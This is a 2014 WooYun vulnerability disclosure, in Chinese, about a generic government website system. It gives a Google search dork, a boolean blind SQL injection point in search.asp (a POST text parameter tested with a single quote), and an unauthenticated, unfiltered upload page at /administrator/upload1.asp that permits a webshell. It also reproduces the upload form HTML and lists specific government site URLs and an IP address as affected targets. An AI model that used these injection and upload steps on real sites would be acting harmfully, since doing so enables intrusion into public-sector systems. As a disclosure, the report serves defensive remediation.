当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081732

漏洞标题:某通用型政府系统SQL注射+前台getshell

相关厂商:cncert

漏洞作者: 郭斯特

提交时间:2014-11-04 18:35

修复时间:2015-02-02 18:36

公开时间:2015-02-02 18:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-04: 细节已通知厂商并且等待厂商处理中
2014-11-09: 厂商已经确认,细节仅向厂商公开
2014-11-12: 细节向第三方安全合作伙伴开放
2015-01-03: 细节向核心白帽子及相关领域专家公开
2015-01-13: 细节向普通白帽子公开
2015-01-23: 细节向实习白帽子公开
2015-02-02: 细节向公众公开

简要描述:

RT~

详细说明:

前人提交过
WooYun: 某通用型政府系统SQL注射
谷歌搜索:inurl:zcfg_read.asp?id=
sql 类型(搜索型基于布尔型的盲注)
注入文件:search.asp
post:text=1' (单引号报错)
http://www.hyxzfw.gov.cn/search.asp
post:text=1

wooyun.png


http://www.wyxzfw.com/search.asp
post:text=1

wooyun.png


wooyun.png


http://www.gzshebao.org/search.asp

wooyun.png


wooyun.png


http://www.jshuaqiao.com/search.asp

wooyun.png


http://www.xlinfo.gov.cn/search.asp

wooyun.png


http://www.ccxzwzx.gov.cn/search.asp
post:text=1
http://60.8.102.174/search.asp
post:text=1

漏洞证明:

前台getshell
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>上传图片</title>
<style type="text/css">
<!--
a { font-family: "宋体"; font-size: 9pt; font-style: normal; line-height: 13pt; font-weight: normal; font-variant: normal; text-transform: none; color: ; text-decoration: none}
a:hover { font-family: "宋体"; font-size: 9pt; font-style: normal; line-height: 13pt; font-weight: normal; font-variant: normal; text-transform: none; color: ; text-decoration: underline}
td { font-family: "宋体"; font-size: 9pt; font-style: normal; line-height: 13pt; font-weight: normal; font-variant: normal; text-transform: none; color: }
br { font-family: "宋体"; font-size: 9pt; font-style: normal; line-height: 13pt; font-weight: normal; font-variant: normal; text-transform: none; color: }
.bk { font-size: 9pt; border: 1px solid}
body { font-family: "宋体"; font-size: 9pt; font-style: normal; line-height: 13pt; font-weight: normal; font-variant: normal; text-transform: none}
.an { font-family: "宋体"; font-size: 9pt; background-color: ; border: 1px solid; color: }
.xzy { border: solid; border-width: 0px 1px 1px}
.zx { border: solid; border-width: 0px 0px 1px 1px}
.sxz { border: solid; border-width: 1px 0px 1px 1px}
.s { border: ; border-style: solid; border-top-width: 1px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px}
.y { border: ; border-style: solid; border-top-width: 0px; border-right-width: 1px; border-bottom-width: 0px; border-left-width: 0px}
.font { font-family: "Arial Black"; font-size: 14pt; color: }
.x { border: ; border-style: solid; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px}
.z { border: ; border-style: solid; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 1px}
.sx { border: ; border-style: solid; border-top-width: 1px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px}
-->
</style>
</head>
<body leftmargin="0" topmargin="0">
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<form name="form1" method="post" action="saveupload1.asp" enctype="multipart/form-data">
<tr>
<td align="center">
<input type="file" name="file1" size=10 class="an">
<input type="submit" name="Submit" value="上传" class="an">
</td>
</tr>
</form>
</table>
</body>
</html>
/administrator/upload1.asp
这里可以直接访问
而且上传木有做任何格式过滤,
导致getshell
http://www.wyxzfw.com/administrator/upload1.asp

wooyun.png


wooyun.png


http://www.ccxzwzx.gov.cn/administrator/upload1.asp

wooyun.png


http://www.jshuaqiao.com/administrator/upload1.asp

wooyun.png


http://www.gzshebao.org/administrator/upload1.asp
http://60.8.102.174/administrator/upload1.asp
还有些有安全狗的。这里木有免杀马,就到此为止,但漏洞的确存在~

修复方案:

过滤

版权声明:转载请注明来源 郭斯特@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-11-09 09:30

厂商回复:

最新状态:

暂无


漏洞评价:

评论